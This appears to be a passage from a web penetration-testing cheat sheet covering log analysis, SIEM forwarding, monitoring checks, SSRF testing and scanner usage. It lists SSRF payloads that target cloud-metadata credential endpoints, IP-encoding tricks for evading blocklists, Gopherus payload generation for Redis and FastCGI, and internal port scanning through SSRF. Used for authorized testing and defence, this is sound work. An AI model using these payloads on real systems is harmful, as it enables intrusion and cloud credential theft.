# - Insecure artifact storage
# - Missing signature verification
Log Analysis
grep/awk/sed (basic)
# Find failed login attempts
grep "Failed password" /var/log/auth.log
# Count by IP
grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn
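The count-by-IP pipeline above keys on a fixed field position, which shifts between the "Failed password for root" and "Failed password for invalid user X" variants. The added shell example below (not from the original page) anchors on the token after "from" instead and adds a threshold filter; SAMPLE_AUTH_LOG is a constructed sample in sshd's syslog format, not a real capture.

```bash
#!/usr/bin/env bash
# Added example: failed-login tally and brute-force flagging for sshd logs. Not from the original page.

failed_logins() { # stdin: auth.log lines -> "count ip" per source, busiest first
    # "from <ip> port" is stable across both message variants, so find "from" instead of counting fields
    awk '/Failed password/ { for (i = 1; i < NF; i++) if ($i == "from") { print $(i+1); break } }' \
        | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

brute_force_ips() { # $1 = threshold (default 5); stdin: auth.log -> sources at or above it
    local threshold=${1:-5}
    failed_logins | awk -v t="$threshold" '$1 >= t { print $2 }'
}

# Constructed sample (RFC 5737 documentation addresses)
SAMPLE_AUTH_LOG=$(cat <<'EOF'
Mar  3 09:12:01 web1 sshd[1201]: Failed password for root from 203.0.113.7 port 51012 ssh2
Mar  3 09:12:03 web1 sshd[1201]: Failed password for root from 203.0.113.7 port 51013 ssh2
Mar  3 09:12:04 web1 sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51020 ssh2
Mar  3 09:12:05 web1 sshd[1204]: Accepted publickey for deploy from 198.51.100.4 port 40022 ssh2
Mar  3 09:12:06 web1 sshd[1205]: Failed password for invalid user test from 203.0.113.7 port 51031 ssh2
Mar  3 09:12:07 web1 sshd[1206]: Failed password for root from 203.0.113.7 port 51040 ssh2
Mar  3 09:13:10 web1 sshd[1210]: Failed password for alice from 198.51.100.23 port 60100 ssh2
Mar  3 09:13:12 web1 sshd[1211]: Failed password for deploy from 192.0.2.99 port 33000 ssh2
EOF
)

printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_logins
printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_ips 5
```

On a live box: `brute_force_ips 20 < /var/log/auth.log` (or `journalctl -u ssh --since today | brute_force_ips 20` on systemd hosts); the threshold is the same number you would configure in fail2ban, so the output doubles as a check that the lockout is actually firing.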
# Apache access log - find 404s
awk '$9 == 404' /var/log/apache2/access.log
GoAccess (real-time web log analyzer)
goaccess /var/log/apache2/access.log -o report.html --log-format=COMBINED
goaccess /var/log/nginx/access.log -o /var/www/html/report.html --log-format=COMBINED --real-time-html # --real-time-html needs an output file to refresh
Logwatch (summary emailer)
logwatch --detail High --mailto admin@example.com --range today
Log Forwarding & SIEM
Filebeat (Elastic Stack)
# Install and configure
sudo apt install filebeat
sudo nano /etc/filebeat/filebeat.yml
sudo filebeat setup
sudo systemctl enable --now filebeat
rsyslog (forward logs)
# In /etc/rsyslog.conf add (@@ = TCP, a single @ = UDP; wrap in TLS for anything that leaves a trusted network):
*.* @@remote-host:514
# Restart
sudo systemctl restart rsyslog
Testing for Logging
Manual checks
# Test if failed login is logged
curl -X POST https://example.com/login -d "user=admin&pass=wrong"
# Then check logs
# Test if sensitive actions are logged
# - Admin privilege escalation
# - Password changes
# - Data exports
# - Configuration changes
# Test if logs are tamper-proof
# - Can attacker delete logs?
# - Are logs centralized/remote?
Burp Suite Logger++ (extension)
- Logs all requests/responses
- Useful for correlation with server logs
Detecting Lack of Monitoring
Check for:
# Indirect signals of weak security engineering, such as missing security headers (CSP, HSTS)
curl -sI https://example.com
# No rate limiting (send many requests and watch for a 429, a block, or a slowdown)
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" https://example.com/api/endpoint; done | sort | uniq -c
# No account lockout after failed logins
# Manual: attempt 10+ failed logins and see if the account locks; then check whether the attempts show up in logs or raise an alert
SSRFmap
python3 ssrfmap.py -r request.txt -p url
python3 ssrfmap.py -r request.txt -p url -m readfiles
Gopherus (generate SSRF payloads)
# For MySQL
gopherus --exploit mysql
# For Redis
gopherus --exploit redis
# For FastCGI
gopherus --exploit fastcgi
Manual SSRF Testing
Basic tests
# Internal IPs
curl "https://example.com/fetch?url=http://127.0.0.1"
curl "https://example.com/fetch?url=http://localhost"
curl "https://example.com/fetch?url=http://192.168.1.1"
curl "https://example.com/fetch?url=http://10.0.0.1"
# Cloud metadata (AWS)
curl "https://example.com/fetch?url=http://169.254.169.254/latest/meta-data/"
# Bypasses for naive blocklists: alternative spellings of 127.0.0.1
curl "https://example.com/fetch?url=http://127.1"
# Try: http://2130706433 (decimal), http://0x7f000001 (hex), http://0177.0.0.1 (octal), http://[::1] (IPv6 loopback)
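The alternative spellings listed above, generated rather than remembered: the added shell example below (not from the original page) prints every common representation of an IPv4 address from plain shell arithmetic, so the output can be fed to the fetch parameter one line at a time and each response compared against the plain-address baseline. The fetch URL in the usage comment is illustrative.

```bash
#!/usr/bin/env bash
# Added example: alternative encodings of an IPv4 address for SSRF blocklist bypass tests.
# Not from the original page. Pure shell arithmetic, no target needed to run.

ip_variants() { # $1 = dotted IPv4 -> one representation per line
    local ip=$1 a b c d n
    set -- $(printf '%s' "$ip" | tr '.' ' ')
    a=$1 b=$2 c=$3 d=$4
    n=$(( (a << 24) | (b << 16) | (c << 8) | d ))
    printf '%s\n' "$ip"                                          # dotted decimal baseline
    printf '%u\n' "$n"                                           # single 32-bit decimal: 2130706433
    printf '0x%08x\n' "$n"                                       # hex: 0x7f000001
    printf '0%o.%s.%s.%s\n' "$a" "$b" "$c" "$d"                  # leading-zero octal first octet: 0177.0.0.1
    printf '%s.%s.%s\n' "$a" "$b" "$(( (c << 8) | d ))"          # three-part form: 127.0.1
    printf '%s.%s\n' "$a" "$(( (b << 16) | (c << 8) | d ))"      # two-part form: 127.1
    printf '0x%02x.0x%02x.0x%02x.0x%02x\n' "$a" "$b" "$c" "$d"   # hex per octet
    printf '[::ffff:%s]\n' "$ip"                                 # IPv4-mapped IPv6 literal
    printf '%s.nip.io\n' "$ip"                                   # wildcard DNS that resolves back to the IP
}

# Usage against a hypothetical SSRF sink:
# for u in $(ip_variants 127.0.0.1); do
#     curl -s -o /dev/null -m 10 -w "$u %{http_code} %{size_download}\n" "https://example.com/fetch?url=http://$u/"
# done
ip_variants 127.0.0.1
```

Status code and body size per variant are what you want to diff: the blocklist usually rejects the dotted form with a 4xx and a short error body, while a variant that slips through returns whatever the internal service served.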
# DNS rebinding / wildcard DNS helpers
# - http://1u.ms/ (DNS rebinding helper)
# - http://nip.io (wildcard DNS: any name of the form <ip>.nip.io resolves to that IP)
curl "https://example.com/fetch?url=http://127.0.0.1.nip.io"
SSRF payload list locations
# PayloadsAllTheThings
git clone https://github.com/swisskyrepo/PayloadsAllTheThings
# See SSRF Injection section
# SecLists
git clone https://github.com/danielmiessler/SecLists
# Fuzzing/SSRF-Injection-Payload-List.txt
Cloud metadata endpoints
# AWS (IMDSv1 answers plain GETs; IMDSv2 first needs a PUT to /latest/api/token with an X-aws-ec2-metadata-token-ttl-seconds header, which most SSRF primitives cannot send)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Google Cloud (requires the request header Metadata-Flavor: Google, so only reachable through an SSRF that lets you set headers)
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure (requires the request header Metadata: true)
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
Burp Collaborator (detect blind SSRF)
# In Burp Suite Professional
# 1. Go to Burp > Burp Collaborator client
# 2. Copy payload URL
# 3. Inject into SSRF param
curl "https://example.com/fetch?url=http://YOUR_PAYLOAD.oastify.com" # oastify.com is the current default Collaborator domain; older setups use burpcollaborator.net
# Check Collaborator for DNS/HTTP interactions (a DNS-only hit still proves the URL was resolved server-side)
Interactsh (open-source alternative)
# Server
interactsh-server
# Client
interactsh-client
# Use generated domain in SSRF tests
curl "https://example.com/fetch?url=http://YOUR_ID.interact.sh"
Port Scanning via SSRF
# Scan internal ports: record status code and response time per port; closed ports usually fail fast, open ones return content or time out
for port in {1..1000}; do
curl -s -o /dev/null -m 5 -w "$port %{http_code} %{time_total}\n" "https://example.com/fetch?url=http://127.0.0.1:$port" &
done
wait
# Or use Burp Intruder with port list
Browser Extensions
- HackBar: Quickly modify URLs
- Postman Interceptor: Capture and modify requests
Nuclei (vulnerability scanner with templates)
# Install (v3 is current; the v2 import path is for older releases)
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Basic scan
nuclei -u https://example.com
# Scan with specific templates (directory layout depends on the nuclei-templates release; list what is installed with nuclei -tl)
nuclei -u https://example.com -t http/cves/
nuclei -u https://example.com -t http/vulnerabilities/
# Scan list of URLs
nuclei -l urls.txt
# Custom template
nuclei -u https://example.com -t custom-template.yaml
OWASP ZAP (Full Suite)
# CLI spider + scan
zap-cli quick-scan -s all -r https://example.com
# Baseline scan (passive)
zap-baseline.py -t https://example.com
# Full scan
zap-full-scan.py -t https://example.com
Acunetix / Netsparker (now Invicti) / Burp Scanner (Commercial)
- Full automated web app scanners
- Cover most OWASP Top 10
- Require licenses
| Category | Must-Have Tools |
|---|---|
| Proxy/Intercept | Burp Suite, OWASP ZAP |
| Recon | nmap, WhatWeb, Wappalyzer |
| Directory/File | Gobuster, ffuf, Feroxbuster |
| Injection | SQLMap, Commix, XSStrike |
| Auth Testing | Hydra, jwt_tool, Hashcat |
| TLS/Crypto | testssl.sh, SSLScan, SSLyze |
| Secrets | TruffleHog, Gitleaks, detect-secrets |
| Dependencies | Retire.js, npm audit, OWASP Dependency-Check, Snyk |
| CMS | WPScan, Droopescan, Joomscan |
| SSRF | SSRFmap, Burp Collaborator, Interactsh |
| Deserialization | ysoserial, phpggc |
| Multi-purpose | Nuclei, Nikto, Wapiti |
| Extension | Use |
|---|---|
| Wappalyzer | Technology detection |
| Cookie-Editor | View/modify cookies |
| FoxyProxy | Proxy switching (Burp/ZAP) |
| Retire.js | Detect vulnerable JS libraries |
| HackBar | Quick payload injection |
| JWT Debugger | Decode JWTs |
| HTTPS Everywhere | Force HTTPS |